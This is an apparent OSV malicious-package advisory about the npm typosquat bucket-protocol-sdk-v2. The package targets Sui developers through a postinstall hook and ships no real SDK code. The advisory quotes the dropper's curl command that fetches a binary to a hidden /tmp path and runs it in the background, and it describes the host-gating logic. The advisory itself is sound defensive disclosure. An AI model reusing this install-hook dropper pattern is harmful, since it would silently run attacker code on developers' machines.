{
  "id": "MAL-2026-4502",
  "summary": "Malicious code in bucket-protocol-sdk-v2 (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4)\nbucket-protocol-sdk-v2 advertises itself as a 'community maintained drop-in replacement' for the Sui ecosystem's bucket-protocol-sdk, but its src/ tree contains only empty stubs (`bucket.ts: export {};`, `index.ts: export * from './bucket';`) — no real SDK code is shipped. The entire payload is the postinstall hook. package.json declares `\"postinstall\": \"node install.js\"`; install.js checks whether the host is a Sui developer (presence of the `sui` binary or `~/.sui/sui_config/client.yaml`) and then runs `curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper &` to fetch, stage, and background-execute an attacker binary at a hidden /tmp path. The variable is literally named `implantUrl` with the comment `PUT YOUR ACTUAL 0x0.st URL HERE`, identifying the intended payload host as the anonymous 0x0.st file dump. The URL is currently an empty string in this published version (staged/broken release), so today's install does not actually fetch a binary, but the dropper scaffolding, target-gating, hidden staging path, backgrounded execution, and typosquat-of-a-Sui-SDK lure are unambiguous. Any subsequent republish trivially fills the URL. The combination of hostile-named scaffolding, dev-machine-targeting gate, anonymous-host comment, and hollow library content satisfies the namespace-abuse-typosquat-with-payload and generic-binary-runner-dropper patterns.\n",
  "modified": "2026-05-26T06:02:15.177292589Z",
  "published": "2026-05-20T04:04:00Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-003456",
        "source": "amazon-inspector",
        "modified_time": "2026-05-20T04:04:30Z",
        "versions": ["1.0.26"],
        "sha256": "1b25f4c8e7236236452ca049e0a8409ea8cea78d9ceb131daeea771d6365f61b",
        "import_time": "2026-05-26T05:50:40.680023655Z"
      },
      {
        "id": "IN-MAL-2026-003455",
        "source": "amazon-inspector",
        "versions": ["1.0.11"],
        "sha256": "5bab9298f8bac43d26a48a14cb001113d1415a38e9dbe3d78c55a8ebba95e679",
        "modified_time": "2026-05-20T04:04:10Z",
        "import_time": "2026-05-26T05:50:40.570388632Z"
      },
      {
        "id": "IN-MAL-2026-003462",
        "source": "amazon-inspector",
        "versions": ["1.0.23"],
        "modified_time": "2026-05-20T04:21:39Z",
        "sha256": "66a46f323763deecb5661ae7aa597ac73691211c718359914fef69c4322309ee",
        "import_time": "2026-05-26T05:50:41.316971934Z"
      },
      {
        "id": "IN-MAL-2026-003461",
        "source": "amazon-inspector",
        "modified_time": "2026-05-20T04:21:14Z",
        "versions": ["1.0.12"],
        "sha256": "9612ba97a11244d132e6893004e23f8ba4999200709fc04dc4677a972de03155",
        "import_time": "2026-05-26T05:50:41.208819798Z"
      },
      {
        "id": "IN-MAL-2026-003454",
        "source": "amazon-inspector",
        "sha256": "b70afaf3f61c7ec2726720fb4c7b00256bed2cd2eb65dc165cfa0fef243ecb13",
        "modified_time": "2026-05-20T04:04:00Z",
        "versions": ["1.0.22"],
        "import_time": "2026-05-26T05:50:40.436204814Z"
      },
      {
        "id": "IN-MAL-2026-003600",
        "source": "amazon-inspector",
        "versions": ["1.0.18"],
        "sha256": "e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4",
        "modified_time": "2026-05-20T19:30:10Z",
        "import_time": "2026-05-26T05:50:56.414273874Z"
      },
      {
        "id": "IN-MAL-2026-003612",
        "source": "amazon-inspector",
        "modified_time": "2026-05-20T20:42:07Z",
        "sha256": "f213ad1e13ca48fd037fbad78f53b85c280b913fac9cd88632c4ad02f1fa980d",
        "versions": ["1.0.19"],
        "import_time": "2026-05-26T05:50:58.104269831Z"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.26"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.11"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.23"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.12"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.22"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.18"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/bucket-protocol-sdk-v2/v/1.0.19"}
  ],
  "affected": [
    {
      "package": {
        "name": "bucket-protocol-sdk-v2",
        "ecosystem": "npm",
        "purl": "pkg:npm/bucket-protocol-sdk-v2"
      },
      "versions": ["1.0.26", "1.0.11", "1.0.23", "1.0.12", "1.0.22", "1.0.18", "1.0.19"],
      "database_specific": {
        "cwes": [
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"}
        ],
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bucket-protocol-sdk-v2/MAL-2026-4502.json",
        "indicators": {
          "package_integrity": [
            {
              "filename": "bucket-protocol-sdk-v2-1.0.26.tgz",
              "hashes": {
                "sha1": "d2a7ff249158e4d6e9645fde6d0bfb4a5508267a",
                "sha512_sri": "sha512-TUDlJnnMfPILAEnK4oJLNRqnrfEBnrL1bjbdPJdLtlmcOKMC1B/SdfAhyIRqWwwOxdShRTvHXz2p6/UDEt08Kw=="
              }
            }
          ],
          "evidence_files": [
            {
              "sha256": "2d541f32fa2565d1bd59984485a53d5d8e2e5d6ae8dcdcf39487df3aa74c9cce",
              "path": "install.js",
              "tlsh": "86f0c0d202d2b336b9200cd5e959c43aa07bc0007417e6c494c84af72243a24c753cf7"
            },
            {
              "sha256": "44fed77a3d0a86e89770b87608011b2f2b182bbd38aec02e3c133b30f24c032f",
              "path": "package.json",
              "tlsh": "fbe0d82459134bb725c496570c26a167b7255f1f4444380c2adf9b1c839f7778cfa319"
            }
          ]
        }
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {"name": "Amazon Inspector", "contact": ["actran@amazon.com"], "type": "FINDER"}
  ]
}